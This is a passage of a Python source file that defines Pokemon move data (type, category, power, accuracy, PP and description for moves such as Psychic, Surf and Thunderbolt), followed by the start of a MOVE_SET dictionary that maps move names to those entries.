\"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User performs any move in the game at random.\")\n\nMIMIC = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Copies the opponent's last move.\")\n\nMINIMIZE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Sharply raises user's Evasiveness.\")\n\nMIRROR_MOVE = dict(\n\tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"User performs the opponent's last move.\")\n\nMIST = dict(\n \tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"User's stats cannot be changed for a period of time.\")\n\nNIGHT_SHADE = dict(\n\tELEMENT_TYPE = \"GHOST\",\n\tATTRIBUTES = GHOST,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Inflicts damage equal to user's level.\")\n\nPAY_DAY = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"A small amount of money is gained after the battle resolves.\")\n\nPECK = dict(\n \tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 35,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"\")\n\nPETAL_DANCE = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 120, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User attacks for 2-3 turns but then becomes confused.\")\n\nPIN_MISSILE = dict(\n\tELEMENT_TYPE = \"BUG\",\n\tATTRIBUTES = BUG,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 25,\n\tACCURACY = 95,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nPOISON_GAS = dict(\n\tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 90,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Poisons opponent.\")\n\nPOISON_POWDER = dict(\n\tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 75,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"Poisons opponent.\")\n\nPOISON_STING = dict(\n\tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"May poison the opponent.\")\n\nPOUND = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 
40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"\")\n\nPSYBEAM = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 65,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May confuse opponent.\")\n\nPSYCHIC = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 90,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May lower opponent's Special Defense.\")\n\nPSYWAVE = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = None,\n\tACCURACY = 80,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Inflicts damage 50-150% of user's level.\")\n\nQUICK_ATTACK = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"User attacks first.\")\n\nRAGE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 20,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Raises user's Attack when hit.\")\n\nRAZOR_LEAF = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 55,\n\tACCURACY = 95,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"High critical hit ratio.\")\n\nRAZOR_WIND = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 80, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Charges on first turn, attacks on second. High critical hit ratio.\")\n\nRECOVER = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User recovers half its max HP.\")\n\nREFLECT = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Halves damage from Physical attacks for 5 turns.\")\n\nREST = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User sleeps for 2 turns, but user is fully healed.\")\n\nROAR = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"In battles, the opponent switches. 
In the wild, the Pokemon runs.\")\n\nROCK_SLIDE = dict(\n\tELEMENT_TYPE = \"ROCK\",\n\tATTRIBUTES = ROCK,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 75,\n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May cause flinching.\")\n\nROCK_THROW = dict(\n\tELEMENT_TYPE = \"ROCK\",\n\tATTRIBUTES = ROCK,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 50,\n\tACCURACY = 90,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"\")\n\nROLLING_KICK = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 60,\n\tACCURACY = 85,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May cause flinching.\")\n\nSAND_ATTACK = dict(\n\tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Lowers opponent's ACCURACY.\")\n\nSCRATCH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"\")\n\nSCREECH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 85,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Sharply lowers opponent's Defense.\")\n\nSEISMIC_TOSS = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Inflicts damage equal to user's level.\")\n\nSELF_DESTRUCT = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 200, \n\tACCURACY = 100,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"User faints.\")\n\nSHARPEN = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Raises user's Attack.\")\n\nSING = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 55,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Puts opponent to sleep.\")\n\nSKULL_BASH = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 130, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Raises Defense on first turn, attacks on second.\")\n\nSKY_ATTACK = dict(\n\tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 140, \n\tACCURACY = 90,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"Charges on first turn, attacks on second. 
May cause flinching.\")\n\nSLAM = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 75,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"\")\n\nSLASH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 70,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"High critical hit ratio.\")\n\nSLEEP_POWDER = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 75,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Puts opponent to sleep.\")\n\nSLUDGE = dict(\n \tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 65,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May poison opponent.\")\n\nSMOG = dict(\n \tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 30,\n\tACCURACY = 70,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May poison opponent.\")\n\nSMOKESCREEN = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Lowers opponent's ACCURACY.\")\n\nSOFT_BOILED = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User recovers half its max HP.\")\n\nSOLAR_BEAM = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 120, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Charges on first turn, attacks on second.\")\n\nSONIC_BOOM = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = None,\n\tACCURACY = 90,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Always inflicts 20 HP.\")\n\nSPIKE_CANNON = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 20,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nSPLASH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Doesn't do ANYTHING.\")\n\nSPORE = dict(\n \tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Puts opponent to sleep.\")\n\nSTOMP = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 65,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May cause flinching.\")\n\nSTRENGTH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"\")\n\nSTRING_SHOT = dict(\n\tELEMENT_TYPE = \"BUG\",\n\tATTRIBUTES = BUG,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 95,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Sharply lowers opponent's Speed.\")\n\nSTRUGGLE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 50,\n\tACCURACY = 100,\n\tPOWER_POINTS = None,\n\tDESCRIPTION = \"Only usable when all PP are gone. 
Hurts the user.\")\n\nSTUN_SPORE = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 75,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Paralyzes opponent.\")\n\nSUBMISSION = dict(\n \tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 80,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"User receives recoil damage.\")\n\nSUBSTITUTE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Uses HP to create a decoy that takes hits.\")\n\nSUPER_FANG = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Always takes off half of the opponent's HP.\")\n\nSUPERSONIC = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 55,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Confuses opponent.\")\n\nSURF = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 90,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Hits all adjacent Pokemon.\")\n\nSWIFT = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 60,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Ignores ACCURACY and Evasiveness.\")\n\nSWORDS_DANCE = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Sharply raises user's Attack.\")\n\nTACKLE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"\")\n\nTAIL_WHIP = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Lowers opponent's Defense.\")\n\nTAKE_DOWN = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 90,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"User receives recoil damage.\")\n\nTELEPORT = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Allows user to flee wild battles; also warps player to last PokeCenter.\")\n\nTHRASH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 120,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User attacks for 2-3 turns but then becomes confused.\")\n\nTHUNDER = dict(\n \tELEMENT_TYPE = \"ELECTRIC\",\n\tATTRIBUTES = ELECTRIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 110,\n\tACCURACY = 70,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nTHUNDER_PUNCH = dict(\n\tELEMENT_TYPE = \"ELECTRIC\",\n\tATTRIBUTES = ELECTRIC,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 75,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nTHUNDER_SHOCK = dict(\n\tELEMENT_TYPE = \"ELECTRIC\",\n\tATTRIBUTES = ELECTRIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40, \n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nTHUNDER_WAVE = dict(\n\tELEMENT_TYPE = \"ELECTRIC\",\n\tATTRIBUTES = ELECTRIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = 
None, \n\tACCURACY = 90,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Paralyzes opponent.\")\n\nTHUNDERBOLT = dict(\n \tELEMENT_TYPE = \"ELECTRIC\",\n\tATTRIBUTES = ELECTRIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 90,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nTOXIC = dict(\n \tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Badly poisons opponent.\")\n\nTRANSFORM = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User takes on the form and attacks of the opponent.\")\n\nTRI_ATTACK = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 80, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May paralyze, burn or freeze opponent.\")\n\nTWINEEDLE = dict(\n \tELEMENT_TYPE = \"BUG\",\n\tATTRIBUTES = BUG,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 25,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Hits twice in one turn. May poison opponent.\")\n\nVICE_GRIP = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 55,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"\")\n\nVINE_WHIP = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 45,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"\")\n\nWATER_GUN = dict(\n\tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40, \n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"\")\n\nWATERFALL = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May cause flinching.\")\n\nWHIRLWIND = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"In battles, the opponent switches. 
In the wild, the Pokemon runs.\")\n\nWING_ATTACK = dict(\n\tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 60,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"\")\n\nWITHDRAW = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Raises user's Defense.\")\n\nWRAP = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 90,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Traps opponent, damaging them for 4-5 turns.\")\n\n\"\"\"Dictionary containing the primary Pokemon moves.\n\nMaps each move name to a dictionary of that move's properties and statistics.\n\"\"\"\n\nMOVE_SET = {\n\t\"ABSORB\": ABSORB,\n\t\"ACID\": ACID,\n\t\"ACID_ARMOUR\": ACID_ARMOUR,\n\t\"AGILITY\": AGILITY,\n\t\"AMNESIA\": AMNESIA,\n\t\"AURORA_BEAM\": AURORA_BEAM,\n\t\"BARRAGE\": BARRAGE,\n\t\"BARRIER\": BARRIER,\n\t\"BIDE\": BIDE,\n\t\"BIND\": BIND,\n\t\"BITE\": BITE,\n\t\"BLIZZARD\": BLIZZARD,\n\t\"BODY_SLAM\": BODY_SLAM,\n\t\"BONEMERANG\": BONEMERANG,\n\t\"BONE_CLUB\": BONE_CLUB,\n\t\"BUBBLE\": BUBBLE,\n\t\"BUBBLE_BEAM\": BUBBLE_BEAM,\n\t\"CLAMP\": CLAMP,\n\t\"COMET_PUNCH\": COMET_PUNCH,\n\t\"CONFUSE_RAY\": CONFUSE_RAY,\n\t\"CONFUSION\": CONFUSION,\n\t\"CONSTRICT\": CONSTRICT,\n\t\"CONVERSION\": CONVERSION,\n\t\"COUNTER\": COUNTER,\n\t\"CRABHAMMER\": CRABHAMMER,\n\t\"CUT\": CUT,\n\t\"DEFENSE_CURL\": DEFENSE_CURL,\n\t\"DIG\": DIG,\n\t\"DISABLE\": DISABLE,\n\t\"DIZZY_PUNCH\": DIZZY_PUNCH,\n\t\"DOUBLE_EDGE\": DOUBLE_EDGE,\n\t\"DOUBLE_KICK\": DOUBLE_KICK,\n\t\"DOUBLE_SLAP\": DOUBLE_SLAP,\n\t\"DOUBLE_TEAM\": DOUBLE_TEAM,\n\t\"DRAGON_RAGE\": DRAGON_RAGE,\n\t\"DREAM_EATER\": DREAM_EATER,\n\t\"DRILL_PECK\": DRILL_PECK,\n\t\"EARTHQUAKE\": EARTHQUAKE,\n\t\"EGG_BOMB\": EGG_BOMB,\n\t\"EMBER\": EMBER,\n\t\"EXPLOSION\": EXPLOSION,\n\t\"FIRE_BLAST\": FIRE_BLAST,\n\t\"FIRE_PUNCH\": FIRE_PUNCH,\n\t\"FIRE_SPIN\": FIRE_SPIN,\n\t\"FISSURE\": FISSURE,\n\t\"FLAMETHROWER\": FLAMETHROWER,\n\t\"FLASH\": FLASH,\n\t\"FLY\": FLY,\n\t\"FOCUS_ENERGY\": FOCUS_ENERGY,\n\t\"FURY_ATTACK\": FURY_ATTACK,\n\t\"FURY_SWIPES\": FURY_SWIPES,\n\t\"GLARE\": GLARE,\n\t\"GROWL\": GROWL,\n\t\"GROWTH\": GROWTH,\n\t\"GUILLOTINE\": GUILLOTINE,\n\t\"GUST\": GUST,\n\t\"HARDEN\": HARDEN,\n\t\"HAZE\": HAZE,\n\t\"HEADBUTT\": HEADBUTT,\n\t\"HIGH_JUMP_KICK\": HIGH_JUMP_KICK,\n\t\"HORN_ATTACK\": HORN_ATTACK,\n\t\"HORN_DRILL\": HORN_DRILL,\n\t\"HYDRO_PUMP\": HYDRO_PUMP,\n\t\"HYPER_BEAM\": HYPER_BEAM,\n\t\"HYPER_FANG\": HYPER_FANG,\n\t\"HYPNOSIS\": HYPNOSIS,\n\t\"ICE_BEAM\": ICE_BEAM,\n\t\"ICE_PUNCH\": ICE_PUNCH,\n\t\"JUMP_KICK\": JUMP_KICK,\n\t\"KARATE_CHOP\": KARATE_CHOP,\n\t\"KINESIS\": KINESIS,\n\t\"LEECH_LIFE\": LEECH_LIFE,\n\t\"LEECH_SEED\": LEECH_SEED,\n\t\"LEER\": LEER,\n\t\"LICK\": LICK,\n\t\"LIGHT_SCREEN\": LIGHT_SCREEN,\n\t\"LOVELY_KISS\": LOVELY_KISS,\n\t\"LOW_KICK\": LOW_KICK,\n\t\"MEDITATE\": MEDITATE,\n\t\"MEGA_DRAIN\": MEGA_DRAIN,\n\t\"MEGA_KICK\": MEGA_KICK,\n\t\"MEGA_PUNCH\": MEGA_PUNCH,\n\t\"METRONOME\": METRONOME,\n\t\"MIMIC\": MIMIC,\n\t\"MINIMIZE\": MINIMIZE,\n\t\"MIRROR_MOVE\": MIRROR_MOVE,\n\t\"MIST\": MIST,\n\t\"NIGHT_SHADE\": NIGHT_SHADE,\n\t\"PAY_DAY\": PAY_DAY,\n\t\"PECK\": PECK,\n\t\"PETAL_DANCE\": PETAL_DANCE,\n\t\"PIN_MISSILE\": PIN_MISSILE,\n\t\"POISON_GAS\": POISON_GAS,\n\t\"POISON_POWDER\": POISON_POWDER,\n\t\"POISON_STING\": POISON_STING,\n\t\"POUND\": POUND,\n\t\"PSYBEAM\": PSYBEAM,\n\t\"PSYCHIC\": PSYCHIC,\n\t\"PSYWAVE\": PSYWAVE,\n\t\"QUICK_ATTACK\": QUICK_ATTACK,\n\t\"RAGE\": RAGE,\n\t\"RAZOR_LEAF\": RAZOR_LEAF,\n\t\"RAZOR_WIND\": RAZOR_WIND,\n\t\"RECOVER\": RECOVER,\n\t\"REFLECT\": REFLECT,\n\t\"REST\": REST,\n\t\"ROAR\": ROAR,\n\t\"ROCK_SLIDE\": ROCK_SLIDE,\n\t\"ROCK_THROW\": ROCK_THROW,\n\t\"ROLLING_KICK\": ROLLING_KICK,\n\t\"SAND_ATTACK\": SAND_ATTACK,\n\t\"SCRATCH\": SCRATCH,\n\t\"SCREECH\": SCREECH,\n\t\"SEISMIC_TOSS\": SEISMIC_TOSS,\n\t\"SELF_DESTRUCT\": 